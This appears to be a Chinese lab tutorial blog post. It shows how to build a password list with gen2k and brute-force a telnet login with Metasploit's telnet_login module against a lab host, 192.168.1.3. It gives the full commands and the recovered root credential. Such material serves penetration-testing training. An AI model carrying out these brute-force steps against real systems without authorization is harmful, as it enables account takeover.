Metasploit批量验证爆破telnet

目的

使用枚举的方法爆破telnet登录密码.

原理

利用gen2k工具,收集来的信息,自动生成密码,使用枚举的方法破解telnet登录密码.

环境

攻击环境

步骤

一、利用gen2k工具生成密码表
  1. 下载好Gen2k. 准备好user.txt ,以此生成对应的密码.
  2. 在终端中输入命令python gen2k.py -n -y -z -e -c -w user.txt -o passwd.txt,生成密码文件passwd.txt,在终端下输入命令more passwd.txt,查看生成的内容.
二、利用Metasploit暴破目标主机telnet服务
  1. 在终端中输入命令nmap –sV 192.168.1.3,扫描目标主机,发现目标主机开启telnet服务.
  2. 在终端中输入命令msfconsole,启动MSF终端.
  3. 在终端中输入命令search telnet,搜索telnet的相关工具和攻击载荷.
  4. 在终端中输入命令use auxiliary/scanner/telnet/telnet_login,启用漏洞利用模块, 提示符就会提示进入到该路径下.
  5. 在终端中输入命令set RHOSTS 192.168.1.3,设置目标主机的IP地址.
    6.在终端中输入命令set PASS_FILE /home/passwd.txt,爆破时使用的密码文件为passwd.txt.
  6. 在终端中输入命令set USER_FILE /home/user.txt,爆破时使用的用户名文件为user.txt.
  7. 在终端中输入exploit 192.168.1.3, 对目标主机进行暴力破解.
  8. 在终端中显示成功对目标主机的telnet服务进行了破解,账号为root,密码:Simplexue123.
  9. 在终端中输入telnet 192.168.1.3,输入获取的账号root和密码Simplexue123,连接成功.
    成功getshell

    进入telent
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • win7 cmd管理员权限设置 net localgroup administrators 用户名 /add 把“...
    f675b1a02698阅读 5,405评论 0 11
  • 部分内容转载自搜狗百科 cmd是command的缩写.即命令提示符(CMD),是在OS / 2 , Windows...
    青冥之上阅读 2,430评论 0 24
  • (一)基本命令 命令格式: 命令 参数 1.ls 显示文件名,等同于dos下dir命令 命令格式:ls [opti...
    飞羽孟德阅读 1,983评论 0 3
  • 1、第八章 Samba服务器2、第八章 NFS服务器3、第十章 Linux下DNS服务器配站点,域名解析概念命令:...
    哈熝少主阅读 3,783评论 0 10
  • CA和证书安全协议(SSL/TLS)OpenSSH 一、CA和证书 (一) PKI(Public Key Infr...
    哈喽别样阅读 1,434评论 0 0